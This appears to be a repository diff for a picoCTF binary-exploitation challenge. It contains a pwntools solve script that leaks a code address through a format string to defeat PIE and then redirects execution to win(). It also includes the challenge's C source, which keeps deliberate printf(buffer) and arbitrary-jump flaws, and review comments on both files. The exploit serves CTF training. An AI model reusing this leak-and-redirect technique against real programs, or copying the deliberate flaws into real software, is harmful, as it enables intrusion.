pwn/pie_time_2
@@ -0,0 +1 @@
|
||||
picoCTF{dummy}
|
||||
Executable
+44
@@ -0,0 +1,44 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
|
||||
|
||||
def conn() -> remote:
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
|
||||
# gdb.attach(r, gdbscript='''
|
||||
# info proc mappings
|
||||
# c
|
||||
# ''')
|
||||
|
||||
# Calculated by inspecting the output - the reported binary start address from gdb
|
||||
leak_offset = 0x1441
|
||||
|
||||
r.recvuntil(b'Enter your name:').decode()
|
||||
r.sendline(b'%p\t'*20)
|
||||
leaks = r.recvline().strip().decode().split('\t')
|
||||
base_leak = leaks[18]
|
||||
exe.address = int(base_leak[2:], 16) - leak_offset
|
||||
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
|
||||
|
||||
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
|
||||
r.sendline(hex(exe.symbols['win']))
|
||||
print(r.recvall().decode())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
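Review bot: `r.sendline(hex(exe.symbols['win']))` in `main()` passes a `str` where the tube API works on bytes, unlike the earlier `r.sendline(b'%p\t'*20)`; pwntools falls back to assuming ASCII and emits a BytesWarning, so `r.sendline(hex(exe.symbols['win']).encode())` keeps the two calls consistent. The constants `leaks[18]` and `leak_offset = 0x1441` are tied to one particular build of `./vuln`, and the existing comment does not say what the field at index 18 is expected to hold; a comment such as `# index 18 and 0x1441 were measured against this exact ./vuln build; re-measure if the binary changes` would document that dependency. The `.decode()` on the first `recvuntil` result is discarded and can be dropped.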
Executable
BIN
Binary file not shown.
@@ -0,0 +1,56 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <signal.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void segfault_handler() {
|
||||
printf("Segfault Occurred, incorrect address.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void call_functions() {
|
||||
char buffer[64];
|
||||
printf("Enter your name:");
|
||||
fgets(buffer, 64, stdin);
|
||||
printf(buffer);
|
||||
|
||||
unsigned long val;
|
||||
printf(" enter the address to jump to, ex => 0x12345: ");
|
||||
scanf("%lx", &val);
|
||||
|
||||
void (*foo)(void) = (void (*)())val;
|
||||
foo();
|
||||
}
|
||||
|
||||
int win() {
|
||||
FILE *fptr;
|
||||
char c;
|
||||
|
||||
printf("You won!\n");
|
||||
// Open file
|
||||
fptr = fopen("flag.txt", "r");
|
||||
if (fptr == NULL)
|
||||
{
|
||||
printf("Cannot open file.\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
// Read contents from file
|
||||
c = fgetc(fptr);
|
||||
while (c != EOF)
|
||||
{
|
||||
printf ("%c", c);
|
||||
c = fgetc(fptr);
|
||||
}
|
||||
|
||||
printf("\n");
|
||||
fclose(fptr);
|
||||
}
|
||||
|
||||
int main() {
|
||||
signal(SIGSEGV, segfault_handler);
|
||||
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
|
||||
|
||||
call_functions();
|
||||
return 0;
|
||||
}
|
||||
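Review bot: In `win()`, `char c` receives the `int` returned by `fgetc()` and is then compared with `EOF`, so where `char` is unsigned the loop never terminates and where it is signed a 0xFF byte in `flag.txt` ends it early; declare `int c;` instead. `win()` is also declared `int` but reaches its closing brace without a `return`, so either add `return 0;` or make it `void`. In `call_functions()`, `printf(buffer)` and the unchecked `scanf("%lx", &val)` feeding an indirect call appear to be the intended challenge flaws; a comment marking them as deliberate, alongside the safe form `printf("%s", buffer)`, would keep the file from being copied as ordinary sample code. `segfault_handler` calls `printf` and `exit`, neither of which is async-signal-safe, which deserves a one-line comment as well.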